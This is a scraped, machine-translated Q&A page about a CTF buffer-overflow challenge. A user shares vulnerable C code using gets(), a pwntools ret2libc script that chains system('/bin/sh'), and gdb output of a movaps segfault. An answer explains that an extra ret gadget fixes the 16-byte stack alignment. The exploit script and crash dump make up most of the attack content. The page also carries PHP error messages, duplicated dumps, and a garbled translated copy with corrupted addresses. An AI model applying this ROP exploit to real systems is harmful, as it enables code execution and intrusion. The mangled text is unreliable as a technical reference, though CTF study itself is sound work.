Warning: file_get_contents(/data/phpspider/zhask/data//catemap/4/c/61.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
ret2libc攻击中的Segfault,但不是硬编码系统调用_C_Segmentation Fault_Ctf - Fatal编程技术网
Fatal编程技术网
  • c/
  • ret2libc攻击中的Segfault,但不是硬编码系统调用

ret2libc攻击中的Segfault,但不是硬编码系统调用

c

ret2libc攻击中的Segfault,但不是硬编码系统调用,c,segmentation-fault,ctf,C,Segmentation Fault,Ctf,我有以下的原始星挑战 #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> void getpath() { char buffer[BUFFSIZE]; char flagBuffer[64]; FILE *fp; unsigned int ret; printf("input path please: "); fflu

我有以下的原始星挑战

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[BUFFSIZE];
  char flagBuffer[64];
  FILE *fp;
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xff000000) == 0xff000000) {
    printf("bzzzt (%p)\n", ret);
    _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{

  getpath();

}
我正在使用pwntools来设计我的开发。这是我的exploit.py文件

from pwn import *

exe = './stack5'

context.clear(arch='amd64')
context.kernel = 'amd64'

system_addr = 0x7ffff7a33440
exit_addr = 0x7ffff7a27120
binsh_addr = 0x7ffff7b97e9a

binary = ELF(exe)
binary.symbols = {'system': system_addr, 'exit': exit_addr}

rop = ROP(binary)
rop.system(binsh_addr)
rop.exit()
print(rop.dump())
payload = cyclic(128)
p = process([exe])
p.sendline(payload)
p.wait()
# Get the core dump
core = Coredump('./core')
print cyclic_find(pack(core.fault_addr))
payload = flat({cyclic_find(pack(core.fault_addr)): rop.chain()})
p = binary.process()
p.recv()
p.sendline(payload)
p.interactive()
这会导致SEG故障。将有效负载保存到txt文件并使用gdb运行后,我发现SEGFULT发生在
do_系统中

input path please: got path aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaa#@
[New process 23199]

Thread 2.1 "stack5" received signal SIGSEGV, Segmentation fault.
[Switching to process 23199]
[----------------------------------registers-----------------------------------]
RAX: 0x7ffff7b97e97 --> 0x2f6e69622f00632d ('-c')
RBX: 0x0
RCX: 0x7ffff7b97e9f --> 0x2074697865006873 ('sh')
RDX: 0x0
RSI: 0x7ffff7dd16a0 --> 0x0
RDI: 0x2
RBP: 0x7fffffffe1d8 --> 0x0
RSP: 0x7fffffffe178 --> 0x7ffff7a48f26 (<__printf+166>: mov    rcx,QWORD PTR [rsp+0x18])
RIP: 0x7ffff7a332f6 (<do_system+1094>:  movaps XMMWORD PTR [rsp+0x40],xmm0)
R8 : 0x7ffff7dd1600 --> 0x0
R9 : 0x4f ('O')
R10: 0x8
R11: 0x246
R12: 0x7ffff7b97e9a --> 0x68732f6e69622f ('/bin/sh')
R13: 0x7fffffffe3f0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff7a332e6 <do_system+1078>: movq   xmm0,QWORD PTR [rsp+0x8]
   0x7ffff7a332ec <do_system+1084>: mov    QWORD PTR [rsp+0x8],rax
   0x7ffff7a332f1 <do_system+1089>: movhps xmm0,QWORD PTR [rsp+0x8]
=> 0x7ffff7a332f6 <do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7ffff7a332fb <do_system+1099>: call   0x7ffff7a23110 <__GI___sigaction>
   0x7ffff7a33300 <do_system+1104>: lea    rsi,[rip+0x39e2f9]        # 0x7ffff7dd1600 <quit>
   0x7ffff7a33307 <do_system+1111>: xor    edx,edx
   0x7ffff7a33309 <do_system+1113>: mov    edi,0x3
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe178 --> 0x7ffff7a48f26 (<__printf+166>:    mov    rcx,QWORD PTR [rsp+0x18])
0008| 0x7fffffffe180 --> 0x7ffff7b97e97 --> 0x2f6e69622f00632d ('-c')
0016| 0x7fffffffe188 --> 0x7fffffffe260 --> 0x10000
0024| 0x7fffffffe190 --> 0xffffe1a0
0032| 0x7fffffffe198 --> 0x7ffff7a33360 (<cancel_handler>:  push   rbx)
0040| 0x7fffffffe1a0 --> 0x7fffffffe194 --> 0xf7a3336000000000
0048| 0x7fffffffe1a8 --> 0x7fffffffe2a0 --> 0x0
0056| 0x7fffffffe1b0 --> 0x7ffff7dd18d0 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffff7a332f6 in do_system (line=0x7ffff7b97e9a "/bin/sh") at ../sysdeps/posix/system.c:125
125 ../sysdeps/posix/system.c: No such file or directory.

请输入路径:获取路径aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa#@
[新程序23199]
线程2.1“stack5”接收到信号SIGSEGV,分段故障。
[切换到流程23199]
[------------------------------------寄存器------------------------------------------]
RAX:0x7ffff7b97e97-->0x2F6E6962F00632D(“-c”)
RBX:0x0
RCX:0x7ffff7b97e9f-->0x20746977865006873(“sh”)
RDX:0x0
RSI:0x7ffff7dd16a0-->0x0
RDI:0x2
RBP:0x7FFFFFE1D8-->0x0
RSP:0x7FFFFFE178-->0x7ffff7a48f26(:mov rcx,QWORD PTR[RSP+0x18])
RIP:0x7ffff7a332f6(:movaps XMMWORD PTR[rsp+0x40],xmm0)
R8:0x7ffff7dd1600-->0x0
R9:0x4f('O')
R10:0x8
R11:0x246
R12:0x7ffff7b97e9a-->0x68732f6e69622f(“/bin/sh”)
R13:0x7FFFFFE3F0-->0x1
R14:0x0
R15:0x0
EFLAGS:0x10246(进位奇偶校验调整零符号陷阱中断方向溢出)
[---------------------------------------代码------------------------------------------]
0x7ffff7a332e6:movq xmm0,QWORD PTR[rsp+0x8]
0x7ffff7a332ec:mov QWORD PTR[rsp+0x8],rax
0x7ffff7a332f1:movhps xmm0,QWORD PTR[rsp+0x8]
=>0x7ffff7a332f6:movaps XMMWORD PTR[rsp+0x40],xmm0
0x7ffff7a332fb:调用0x7ffff7a23110
0x7ffff7a33300:lea rsi,[rip+0x39e2f9]#0x7ffff7dd1600
0x7ffff7a33307:xor edx,edx
0x7ffff7a33309:mov edi,0x3
[-------------------------------------堆栈---------------------------------------------------]
0000 | 0x7FFFFFE178-->0x7ffff7a48f26(:mov rcx,QWORD PTR[rsp+0x18])
0008 | 0x7FFFFFE180-->0x7ffff7b97e97-->0x2F6E6962F00632D(“-c”)
0016 | 0x7FFFFFE188-->0x7FFFFFE260-->0x10000
0024 | 0x7FFFFFE190-->0xFFFF1A0
0032 | 0x7FFFFFE198-->0x7ffff7a33360(:按rbx)
0040 | 0x7FFFFFE1A0-->0x7FFFFFE194-->0xF7A333600000000
0048 | 0x7FFFFFE1A8-->0x7FFFFFE2A0-->0x0
0056 | 0x7FFFFFE1B0-->0x7ffff7dd18d0-->0x0
[------------------------------------------------------------------------------]
图例:代码、数据、rodata、值
停止原因:SIGSEGV
0x00007FF7A332F6位于../sysdeps/posix/system.c处的do_系统(行=0x7FF7B97E9A”/bin/sh)中
125../sysdeps/posix/system.c:没有这样的文件或目录。
令人困惑的是,当我向
系统(“/bin/sh”)添加一个调用时
进入c代码,调用有效,我弹出一个shell,但当我通过ret2libc攻击调用系统时,它会出现故障。

在搜索指令
movaps segfault
后,我遇到了这一问题

MOVAPS问题

如果您在64位挑战中对缓冲的_vfprintf()或do_system()中的movaps指令使用Ubuntu 18.04和segfaulting,那么在返回到GLIBC函数(如printf()和system()之前,请确保堆栈是16字节对齐的。Ubuntu18.04附带的GLIBC版本在某些函数中使用movaps指令将数据移动到堆栈上。64位调用约定要求堆栈在调用指令之前对齐16字节,但这在ROP链执行期间很容易违反,导致该函数的所有后续调用都使用未对齐的堆栈进行。在对未对齐的数据进行操作时,movaps会触发一般保护故障,因此在返回到函数之前,请尝试使用额外的ret填充ROP链,或进一步返回到函数以跳过推送指令

在调用
system
aligned bytes之前,只需添加一个对
ret
小工具的调用,就可以弹出一个shell。

你能解释一下为什么添加一个简单的
ret
可以进行堆栈对齐吗?@kayochin:因为16=2*8,所以RSP要么对齐,要么从16字节对齐中弹出一个。如果您首先遇到了这个问题,那么在小工具链的末尾,您想要的函数的条目RSP%16==0。(与RSP%16==8不同,ABI要求在RSP对齐的情况下运行
call
)。扩展有效载荷以跳过一个以上的
ret
将最终RSP调整8,满足ABI要求。(除非你的一个小工具做了一些疯狂的事情,比如添加rsp,2或
popw%ax
完全不对齐的rsp。) 
input path please: got path aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaa#@
[New process 23199]

Thread 2.1 "stack5" received signal SIGSEGV, Segmentation fault.
[Switching to process 23199]
[----------------------------------registers-----------------------------------]
RAX: 0x7ffff7b97e97 --> 0x2f6e69622f00632d ('-c')
RBX: 0x0
RCX: 0x7ffff7b97e9f --> 0x2074697865006873 ('sh')
RDX: 0x0
RSI: 0x7ffff7dd16a0 --> 0x0
RDI: 0x2
RBP: 0x7fffffffe1d8 --> 0x0
RSP: 0x7fffffffe178 --> 0x7ffff7a48f26 (<__printf+166>: mov    rcx,QWORD PTR [rsp+0x18])
RIP: 0x7ffff7a332f6 (<do_system+1094>:  movaps XMMWORD PTR [rsp+0x40],xmm0)
R8 : 0x7ffff7dd1600 --> 0x0
R9 : 0x4f ('O')
R10: 0x8
R11: 0x246
R12: 0x7ffff7b97e9a --> 0x68732f6e69622f ('/bin/sh')
R13: 0x7fffffffe3f0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff7a332e6 <do_system+1078>: movq   xmm0,QWORD PTR [rsp+0x8]
   0x7ffff7a332ec <do_system+1084>: mov    QWORD PTR [rsp+0x8],rax
   0x7ffff7a332f1 <do_system+1089>: movhps xmm0,QWORD PTR [rsp+0x8]
=> 0x7ffff7a332f6 <do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7ffff7a332fb <do_system+1099>: call   0x7ffff7a23110 <__GI___sigaction>
   0x7ffff7a33300 <do_system+1104>: lea    rsi,[rip+0x39e2f9]        # 0x7ffff7dd1600 <quit>
   0x7ffff7a33307 <do_system+1111>: xor    edx,edx
   0x7ffff7a33309 <do_system+1113>: mov    edi,0x3
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe178 --> 0x7ffff7a48f26 (<__printf+166>:    mov    rcx,QWORD PTR [rsp+0x18])
0008| 0x7fffffffe180 --> 0x7ffff7b97e97 --> 0x2f6e69622f00632d ('-c')
0016| 0x7fffffffe188 --> 0x7fffffffe260 --> 0x10000
0024| 0x7fffffffe190 --> 0xffffe1a0
0032| 0x7fffffffe198 --> 0x7ffff7a33360 (<cancel_handler>:  push   rbx)
0040| 0x7fffffffe1a0 --> 0x7fffffffe194 --> 0xf7a3336000000000
0048| 0x7fffffffe1a8 --> 0x7fffffffe2a0 --> 0x0
0056| 0x7fffffffe1b0 --> 0x7ffff7dd18d0 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffff7a332f6 in do_system (line=0x7ffff7b97e9a "/bin/sh") at ../sysdeps/posix/system.c:125
125 ../sysdeps/posix/system.c: No such file or directory.